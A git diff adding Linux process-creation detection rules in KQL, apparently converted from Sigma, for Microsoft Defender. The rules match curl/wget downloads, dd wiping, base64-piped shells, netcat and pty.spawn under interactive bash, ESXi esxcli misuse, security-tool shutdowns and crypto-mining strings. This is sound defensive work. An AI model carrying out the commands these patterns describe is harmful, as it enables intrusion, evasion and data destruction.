--- /dev/null
+++ b/KQL/rules/linux/process_creation/curl_usage_on_linux.kql
@@ -0,0 +1,13 @@
+// Title: Curl Usage on Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: low
+// Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Scripts created by developers and admins
+//   - Administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/dd_file_overwrite.kql b/KQL/rules/linux/process_creation/dd_file_overwrite.kql
new file mode 100644
index 00000000..7b496334
--- /dev/null
+++ b/KQL/rules/linux/process_creation/dd_file_overwrite.kql
@@ -0,0 +1,12 @@
+// Title: DD File Overwrite
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: low
+// Description: Detects potential overwriting and deletion of a file using DD.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+// False Positives:
+//   - Any user deleting files that way.
+
+DeviceProcessEvents
+| where (FolderPath in~ ("/bin/dd", "/usr/bin/dd")) and ProcessCommandLine contains "of=" and (ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/null")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/decode_base64_encoded_text.kql b/KQL/rules/linux/process_creation/decode_base64_encoded_text.kql
new file mode 100644
index 00000000..354f3cb0
--- /dev/null
+++ b/KQL/rules/linux/process_creation/decode_base64_encoded_text.kql
@@ -0,0 +1,12 @@
+// Title: Decode Base64 Encoded Text
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-d" and FolderPath endswith "/base64"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/disable_or_stop_services.kql b/KQL/rules/linux/process_creation/disable_or_stop_services.kql
new file mode 100644
index 00000000..3cf1fbe5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/disable_or_stop_services.kql
@@ -0,0 +1,12 @@
+// Title: Disable Or Stop Services
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "stop" or ProcessCommandLine contains "disable") and (FolderPath endswith "/service" or FolderPath endswith "/systemctl" or FolderPath endswith "/chkconfig")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/disabling_security_tools.kql b/KQL/rules/linux/process_creation/disabling_security_tools.kql
new file mode 100644
index 00000000..debc1408
--- /dev/null
+++ b/KQL/rules/linux/process_creation/disabling_security_tools.kql
@@ -0,0 +1,12 @@
+// Title: Disabling Security Tools
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-06-17
+// Level: medium
+// Description: Detects disabling security tools
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "off") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "stop" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "disable" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or (ProcessCommandLine contains "0" and FolderPath endswith "/setenforce")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql b/KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql
new file mode 100644
index 00000000..e69d3819
--- /dev/null
+++ b/KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql
@@ -0,0 +1,13 @@
+// Title: Docker Container Discovery Via Dockerenv Listing
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+//   - Legitimate system administrator usage of these commands
+//   - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith ".dockerenv" and (FolderPath endswith "/cat" or FolderPath endswith "/dir" or FolderPath endswith "/find" or FolderPath endswith "/ls" or FolderPath endswith "/stat" or FolderPath endswith "/test" or FolderPath endswith "grep")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql b/KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql
new file mode 100644
index 00000000..e53e2981
--- /dev/null
+++ b/KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql
@@ -0,0 +1,10 @@
+// Title: Download File To Potentially Suspicious Directory Via Wget
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects the use of wget to download content to a suspicious directory
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where FolderPath endswith "/wget" and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql b/KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql
new file mode 100644
index 00000000..2c9d2428
--- /dev/null
+++ b/KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql
@@ -0,0 +1,10 @@
+// Title: Enable BPF Kprobes Tracing
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-25
+// Level: medium
+// Description: Detects common command used to enable bpf kprobes tracing
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/myprobe/enable" or ProcessCommandLine contains "/myretprobe/enable") and (ProcessCommandLine contains "echo 1 >" and ProcessCommandLine contains "/sys/kernel/debug/tracing/events/kprobes/")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql
new file mode 100644
index 00000000..b85224c5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Account Creation Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects user account creation on ESXi system via esxcli
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.t1136, attack.t1059.012
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "system " and ProcessCommandLine contains "account " and ProcessCommandLine contains "add ") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql
new file mode 100644
index 00000000..4e3110fb
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Admin Permission Assigned To Account Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-04
+// Level: high
+// Description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1059.012, attack.t1098
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "system" and (ProcessCommandLine contains " permission " and ProcessCommandLine contains " set" and ProcessCommandLine contains "Admin") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql
new file mode 100644
index 00000000..69d9da04
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Network Configuration Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "network" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql
new file mode 100644
index 00000000..c4ad39af
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Storage Information Discovery Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "storage" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql
new file mode 100644
index 00000000..a3d551ad
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Syslog Configuration Change Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects changes to the ESXi syslog configuration via "esxcli"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1562.001, attack.t1562.003, attack.t1059.012
+// False Positives:
+//   - Legitimate administrative activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " set" and (ProcessCommandLine contains "system" and ProcessCommandLine contains "syslog" and ProcessCommandLine contains "config") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql
new file mode 100644
index 00000000..a65b97ae
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi System Information Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "system" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql
new file mode 100644
index 00000000..d0f42b99
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi VM Kill Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.impact, attack.t1059.012, attack.t1529
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "vm process" and ProcessCommandLine contains "kill") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql
new file mode 100644
index 00000000..3d941723
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi VM List Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "vm process" and ProcessCommandLine endswith " list" and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql
new file mode 100644
index 00000000..ee53f7c0
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi VSAN Information Discovery Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "vsan" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql b/KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql
new file mode 100644
index 00000000..5567e7e9
--- /dev/null
+++ b/KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql
@@ -0,0 +1,10 @@
+// Title: Execution Of Script Located In Potentially Suspicious Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql b/KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql
new file mode 100644
index 00000000..4877e734
--- /dev/null
+++ b/KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: File and Directory Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "(.){200,}" and FolderPath endswith "/file") or FolderPath endswith "/find" or FolderPath endswith "/findmnt" or FolderPath endswith "/mlocate" or (ProcessCommandLine contains "-R" and FolderPath endswith "/ls") or FolderPath endswith "/tree"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/file_deletion.kql b/KQL/rules/linux/process_creation/file_deletion.kql
new file mode 100644
index 00000000..8bd86d21
--- /dev/null
+++ b/KQL/rules/linux/process_creation/file_deletion.kql
@@ -0,0 +1,12 @@
+// Title: File Deletion
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-07
+// Level: informational
+// Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql b/KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql
new file mode 100644
index 00000000..10a4fa07
--- /dev/null
+++ b/KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql
@@ -0,0 +1,12 @@
+// Title: Flush Iptables Ufw Chain
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-18
+// Level: medium
+// Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+//   - Network administrators
+
+DeviceProcessEvents
+| where (FolderPath endswith "/iptables" or FolderPath endswith "/xtables-legacy-multi" or FolderPath endswith "/iptables-legacy-multi" or FolderPath endswith "/ip6tables" or FolderPath endswith "/ip6tables-legacy-multi") and (ProcessCommandLine contains "-F" or ProcessCommandLine contains "-Z" or ProcessCommandLine contains "-X") and (ProcessCommandLine contains "ufw-logging-deny" or ProcessCommandLine contains "ufw-logging-allow" or ProcessCommandLine contains "ufw6-logging-deny" or ProcessCommandLine contains "ufw6-logging-allow")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql b/KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql
new file mode 100644
index 00000000..eac52baa
--- /dev/null
+++ b/KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql
@@ -0,0 +1,12 @@
+// Title: Group Has Been Deleted Via Groupdel
+// Author: Tuan Le (NCSGroup)
+// Date: 2022-12-26
+// Level: medium
+// Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1531
+// False Positives:
+//   - Legitimate administrator activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/groupdel"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/history_file_deletion.kql b/KQL/rules/linux/process_creation/history_file_deletion.kql
new file mode 100644
index 00000000..f9f30c29
--- /dev/null
+++ b/KQL/rules/linux/process_creation/history_file_deletion.kql
@@ -0,0 +1,12 @@
+// Title: History File Deletion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: high
+// Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1565.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql
new file mode 100644
index 00000000..a96b028d
--- /dev/null
+++ b/KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql
@@ -0,0 +1,10 @@
+// Title: Inline Python Execution - Spawn Shell Via OS System Library
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -c " and ProcessCommandLine contains "os.system(")) and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3."))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/install_root_certificate.kql b/KQL/rules/linux/process_creation/install_root_certificate.kql
new file mode 100644
index 00000000..353acf5a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/install_root_certificate.kql
@@ -0,0 +1,12 @@
+// Title: Install Root Certificate
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-05
+// Level: low
+// Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/update-ca-certificates" or FolderPath endswith "/update-ca-trust"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql b/KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql
new file mode 100644
index 00000000..f0c6cf48
--- /dev/null
+++ b/KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql
@@ -0,0 +1,12 @@
+// Title: Interactive Bash Suspicious Children
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-14
+// Level: medium
+// Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.004, attack.t1036
+// False Positives:
+//   - Legitimate software that uses these patterns
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine =~ "bash -i" and ((ProcessCommandLine contains "-c import " or ProcessCommandLine contains "base64" or ProcessCommandLine contains "pty.spawn") or (FolderPath endswith "whoami" or FolderPath endswith "iptables" or FolderPath endswith "/ncat" or FolderPath endswith "/nc" or FolderPath endswith "/netcat"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
new file mode 100644
index 00000000..c4919eb8
--- /dev/null
+++ b/KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
@@ -0,0 +1,13 @@
+// Title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux
+// Author: Milad Cheraghi
+// Date: 2025-10-18
+// Level: high
+// Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.
+// This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - System administrator manually stopping Kaspersky services
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "stop" and ProcessCommandLine contains "kesl") and (FolderPath endswith "/systemctl" or FolderPath endswith "/bash" or FolderPath endswith "/sh")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql b/KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql
new file mode 100644
index 00000000..ff5fb23f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql
@@ -0,0 +1,12 @@
+// Title: Linux Base64 Encoded Pipe to Shell
+// Author: pH-T (Nextron Systems)
+// Date: 2022-07-26
+// Level: medium
+// Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "base64 " and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith " |sh" or ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql b/KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql
new file mode 100644
index 00000000..5039075a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql
@@ -0,0 +1,12 @@
+// Title: Linux Base64 Encoded Shebang In CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "IyEvYmluL2Jhc2" or ProcessCommandLine contains "IyEvYmluL2Rhc2" or ProcessCommandLine contains "IyEvYmluL3pza" or ProcessCommandLine contains "IyEvYmluL2Zpc2" or ProcessCommandLine contains "IyEvYmluL3No"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql b/KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql
new file mode 100644
index 00000000..159fa543
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Linux Crypto Mining Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects command line parameters or strings often used by crypto miners
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+//   - Legitimate use of crypto miners
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "sh -c /sbin/modprobe msr allow_writes=on" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_doas_tool_execution.kql b/KQL/rules/linux/process_creation/linux_doas_tool_execution.kql
new file mode 100644
index 00000000..ef61492e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_doas_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Linux Doas Tool Execution
+// Author: Sittikorn S, Teoderick Contreras
+// Date: 2022-01-20
+// Level: low
+// Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "/doas"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_hacktool_execution.kql b/KQL/rules/linux/process_creation/linux_hacktool_execution.kql
